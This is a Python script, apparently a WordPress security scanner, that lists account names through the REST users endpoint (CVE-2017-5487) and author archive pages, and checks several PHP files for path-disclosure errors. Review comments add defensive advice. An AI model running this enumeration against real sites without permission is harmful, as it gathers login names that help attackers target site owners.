WordPress 安全扫描脚本【未通过】

包含读取用户、基于 CVE-2017-5487 的正则匹配读取用户,以及 WP 配置不当时常见文件的路径泄露检测。

import  re,requests
# Author's usage notes (translated from the original):
#   * The users endpoint returns the first 10 accounts by default; adjust as needed.
#   * For an HTTPS target the author suggests passing verify=False to requests.
#     NOTE(review): verify=False switches off certificate validation, so the
#     responses can no longer be trusted to come from the intended host. For a
#     lab host signed by a private CA, pointing verify= at that CA bundle keeps
#     the check in place.
#   * The "path" finding refers to disclosure of an absolute filesystem path.

# Browser-like request headers sent with every probe.
headers = {
    "User-Agent": (
        "Mozilla/5.0 (Windows NT 10.0; WOW64) "
        "AppleWebKit/537.36 (KHTML, like Gecko) "
        "Chrome/58.0.3029.110 Safari/537.36"
    ),
}

# Base URL of the site under audit (placeholder host).
url = "https://www.xxxxxxxx.com/"
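def user():
    """Print the ``slug`` of each account listed by the REST users endpoint.

    Sends one GET to ``<url>/wp-json/wp/v2/users`` (the listing the page
    associates with CVE-2017-5487) and prints every ``slug`` value on its own
    line. Returns ``None``.

    Changes from the original: the response is parsed as JSON instead of being
    scraped with a regex, the request has a timeout, and a failed request or a
    non-list reply is reported instead of raising or silently printing nothing.

    Defensive note: a printed slug means the site publishes account names to
    anonymous visitors. Sites that do not need a public author listing can
    limit this route to authenticated requests.
    """
    # Normalise the join so a trailing "/" on ``url`` does not produce "//".
    endpoint = url.rstrip("/") + "/wp-json/wp/v2/users"
    try:
        # Without a timeout an unresponsive host would block the run forever.
        res = requests.get(url=endpoint, headers=headers, timeout=10)
    except requests.RequestException as exc:
        print(endpoint + " request failed: " + str(exc))
        return

    try:
        accounts = res.json()
    except ValueError:
        # HTML error pages, WAF blocks and the like are not JSON.
        print(endpoint + " did not return JSON (HTTP " + str(res.status_code) + ")")
        return

    if not isinstance(accounts, list):
        # The REST API answers with an error object when the listing is refused.
        print(endpoint + " did not return a user list (HTTP " + str(res.status_code) + ")")
        return

    for account in accounts:
        if isinstance(account, dict) and "slug" in account:
            print(account["slug"])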
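def user2():
    """Print author slugs exposed through ``?author=<id>`` archive pages.

    Requests ``<url>/?author=N`` for N = 1..19 and prints whatever the page's
    ``<body class="archive author author-<slug> author...">`` attribute
    reveals. Returns ``None``.

    Changes from the original: the pattern is compiled once outside the loop,
    each request has a timeout, and a single failed request is reported and
    skipped instead of aborting the remaining checks.

    Defensive note: the value printed is the author's URL slug as rendered by
    the theme. Where it matches the login name, login throttling and
    multi-factor authentication limit what the disclosure is worth.
    """
    author_class = re.compile(r'<body class="archive author author-(.*?) author')
    base = url.rstrip("/") + "/"
    for author_id in range(1, 20):
        try:
            response = requests.get(
                url=base,
                params={"author": author_id},
                headers=headers,
                timeout=10,
            )
        except requests.RequestException as exc:
            print(base + "?author=" + str(author_id) + " request failed: " + str(exc))
            continue
        response.encoding = "utf-8"
        for title in author_class.findall(response.text):
            print(title)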


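def Route():
    """Report candidate files whose response body contains a PHP fatal error.

    Each path in the fixed list is requested under ``url``. When the body
    contains the text ``Fatal error``, the URL is printed followed by the
    original message (``绝对路径泄露``, i.e. "absolute path disclosure").
    Returns ``None``.

    Changes from the original: paths are joined to the base URL with exactly
    one ``/`` (the original produced ``//`` for most entries and relied on the
    trailing slash for the last one), each request has a timeout, and a failed
    request is reported and skipped instead of aborting the loop.

    Defensive note: a hit means PHP error output is being shown to visitors.
    Setting ``display_errors`` to Off (logging errors instead) or denying
    direct web access to these files removes the disclosure.
    NOTE(review): the check is a plain substring match, so a page that merely
    mentions "Fatal error" is also reported; confirm hits manually.
    """
    candidate_paths = [
        '/wp-admin/includes/admin.php',
        '/wp-content/plugins/akismet/akismet.php',
        '/wp-content/plugins/akismet/hello.php',
        '/wp-content/plugins/default/index.php',
        '/wp-content/plugins/default/404.php',
        '/wp-settings.php',
        # NOTE(review): does not look like a WordPress core path; kept from
        # the original list.
        '/source/function/function_connect.php',
        'wp-content/themes/b2/',
    ]
    base = url.rstrip("/")
    for path in candidate_paths:
        urls = base + "/" + path.lstrip("/")
        try:
            response = requests.get(url=urls, headers=headers, timeout=10)
        except requests.RequestException as exc:
            print(urls + " request failed: " + str(exc))
            continue
        response.encoding = "utf-8"
        if "Fatal error" in response.text:
            print(urls + "绝对路径泄露")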

# Script entry: only the path-disclosure check runs when the file is executed;
# user() and user2() are defined above but are not called here.
Route()